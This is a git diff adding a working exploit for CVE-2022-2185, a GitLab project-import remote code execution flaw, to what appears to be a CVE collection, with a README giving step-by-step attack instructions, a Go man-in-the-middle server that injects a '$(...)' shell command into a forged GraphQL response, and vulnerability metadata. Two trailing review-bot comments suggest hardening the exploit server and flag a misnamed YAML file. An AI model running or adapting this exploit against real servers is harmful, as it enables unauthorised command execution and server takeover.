diff --git a/cve/gitlab/2022/CVE-2022-2185/README.md b/cve/gitlab/2022/CVE-2022-2185/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..e2d1134c7c805fb511fd9a49f3c93883d514273e
--- /dev/null
+++ b/cve/gitlab/2022/CVE-2022-2185/README.md
@@ -0,0 +1,29 @@
+# CVE-2022-2185
+wo ee cve-2022-2185 gitlab authenticated rce
+
+read: https://starlabs.sg/blog/2022/07-gitlab-project-import-rce-analysis-cve-2022-2185/
+
+## how to use
+
+First spawn a gitlab instance. Log in, create a group and project with a unique name. Create an access token.
+
+Edit these lines in main.go and compile it:
+
+```go
+const importProjectName = "projectwtf"
+const runCmd = "/bin/sleep inf"
+const proxyTo = "http://localhost:8000/"
+```
+
+This mitm runs on `*:8100`. Expose it to the Internet.
+
+Log in to target server. Navigate to create a group - import and enter the local server details. When you are going to import, intercept the request and change it:
+
+- `source_type` to `project_entity`
+- `source_full_path` to `your_group/your_project`
+- if `destination_namespace` is empty, change it to any non-empty name
+- `destination_name` is not empty by design
+
+Pass the modified request to server. Wait 255s to get rce.
+
+Note: the command may be run multiple times.
diff --git a/cve/gitlab/2022/CVE-2022-2185/main.go b/cve/gitlab/2022/CVE-2022-2185/main.go
new file mode 100644
index 0000000000000000000000000000000000000000..8c37bfe8e9b707aacc9f8e52050f62232f70d0fa
--- /dev/null
+++ b/cve/gitlab/2022/CVE-2022-2185/main.go
@@ -0,0 +1,76 @@
+package main
+
+import (
+ "io"
+ "os"
+ "fmt"
+ "bytes"
+ "net/url"
+ "net/http"
+ "net/http/httputil"
+)
+
+const importProjectName = "projectwtf"
+const runCmd = "/bin/sleep inf"
+const proxyTo = "http://localhost:8000/"
+var proxyToUrl *url.URL
+
+func init() {
+ var err error
+ proxyToUrl, err = url.Parse(proxyTo)
+ if err != nil {
+ panic(err)
+ }
+}
+
+func perror(a ...any) {
+ fmt.Fprintln(os.Stderr, a...)
+}
+
+func proxy(w http.ResponseWriter, r *http.Request) {
+ perror("IN:", r.Method, r.RequestURI)
+
+ // mitm code
+ if r.Method == "POST" && r.RequestURI == "/api/graphql" {
+ perror("NOTICE: check")
+ bb, err := io.ReadAll(r.Body)
+ r.Body.Close()
+ if err != nil {
+ http.Error(w, err.Error(), http.StatusBadRequest)
+ return
+ }
+
+ if bytes.Contains(bb, []byte(importProjectName)) {
+ perror("NOTICE: replace")
+ // send our fake response
+ hd := w.Header()
+ hd.Set("Content-Type", "application/json; charset=utf-8")
+ hd.Set("Permissions-Policy", "interest-cohort=()")
+ hd.Set("Referrer-Policy", "strict-origin-when-cross-origin")
+ w.WriteHeader(200)
+ w.Write(
+ []byte(
+ `{"data":{"project":{"description":"Example plain HTML site using GitLab Pages: https://pages.gitlab.io/plain-html","visibility":"public","archived":false,"created_at":"2022-07-29T08:17:46Z","shared_runners_enabled":true,"container_registry_enabled":false,"only_allow_merge_if_pipeline_succeeds":false,"only_allow_merge_if_all_discussions_are_resolved":false,"request_access_enabled":false,"printing_merge_request_link_enabled":true,"remove_source_branch_after_merge":true,"autoclose_referenced_issues":true,"suggestion_commit_message":null,"wiki_enabled":false,"template_name":"plainhtml","import_source":"$(`+runCmd+`)"}}}`,
+ ),
+ )
+ return // do not pass to proxy
+ } else {
+ //fmt.Println(string(bb))
+ // restore the body that we have read
+ r.Body = io.NopCloser(bytes.NewBuffer(bb))
+ }
+ }
+
+ rp := httputil.NewSingleHostReverseProxy(proxyToUrl)
+ rp.ServeHTTP(w, r)
+}
+
+func main() {
+ mux := http.NewServeMux()
+ mux.HandleFunc("/", proxy)
+ s := &http.Server {
+ Addr: "0.0.0.0:8100",
+ Handler: mux,
+ }
+ s.ListenAndServe()
+}
diff --git a/cve/gitlab/2022/yaml/CVE-2021-22205.yaml b/cve/gitlab/2022/yaml/CVE-2021-22205.yaml
new file mode 100644
index 0000000000000000000000000000000000000000..bbcfb74e9154ae15a197bde6cc34a82176af45e9
--- /dev/null
+++ b/cve/gitlab/2022/yaml/CVE-2021-22205.yaml
@@ -0,0 +1,23 @@
+id: CVE-2022-2185
+source: https://github.com/ESUAdmin/CVE-2022-2185
+info:
+ name: Gitlab Project import 远程代码执行漏洞
+ severity: critical
+ description: |
+ -GitLab是一个用于仓库管理系统的开源项目。漏洞利用需要经过登录认证,经过认证的攻击者可以利用project导入功能执行任意代码,控制服务器。
+ scope-of-influence:
+ GitLab CE/EE 14.0.x < 14.10.5
+ GitLab CE/EE 15.0.x < 15.0.4
+ GitLab CE/EE 15.1.x < 15.1.1
+ reference:
+ - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2185.json Vendor Advisory
+ - https://gitlab.com/gitlab-org/gitlab/-/issues/366088 Broken Link
+ - https://hackerone.com/reports/1609965
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2022-2185
+ cwe-id: CWE-732
+ cnvd-id: None
+ kve-id: None
+ tags: cve2022,gitlab
\ No newline at end of file
diff --git a/openkylin_list.yaml b/openkylin_list.yaml
index 323454b7beb22c218ff26e79627829ece37c6ab0..020de91cbe8bab48345fb3e17dedd0f1df780334 100644
--- a/openkylin_list.yaml
+++ b/openkylin_list.yaml
@@ -21,6 +21,7 @@ cve: - CVE-2023-22809 gitlab: - CVE-2021-22205 + - CVE-2022-2185 confluence: - CVE-2019-3396 - CVE-2021-26084
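Review bot: `s.ListenAndServe()` in main discards its error, so a failed bind on 0.0.0.0:8100 (port already in use, no permission) ends the program silently with exit status 0; `if err := s.ListenAndServe(); err != nil { perror(err); os.Exit(1) }` keeps the failure visible through the existing perror helper. The same listener is, per the README, meant to be reachable from the Internet, yet the http.Server sets no ReadHeaderTimeout/ReadTimeout and proxy() reads every POST to /api/graphql with an unbounded io.ReadAll, so a single slow or oversized client can pin a connection or exhaust memory; `bb, err := io.ReadAll(http.MaxBytesReader(w, r.Body, 1<<20))` bounds the read, and a header timeout needs only a `time` import. Smaller points: the error from `w.Write` in the replace branch is dropped, `proxyToUrl` should be `proxyToURL`, and the file is not gofmt-clean (unsorted import block, `&http.Server {`).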
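Review bot: The new file is named CVE-2021-22205.yaml but its `id` and `cve-id` fields say CVE-2022-2185, and openkylin_list.yaml already lists CVE-2021-22205 as a separate gitlab entry, so any consumer that keys on the filename will attach this record to the wrong vulnerability; rename it to `CVE-2022-2185.yaml` so that the path, `id:` and the list entry agree. Two `reference` entries carry annotation text copied from the NVD listing (`Vendor Advisory`, `Broken Link`) inside the URL scalar, which makes them unusable as links; keep the bare URL, e.g. `- https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-2185.json`. The file also lacks a trailing newline.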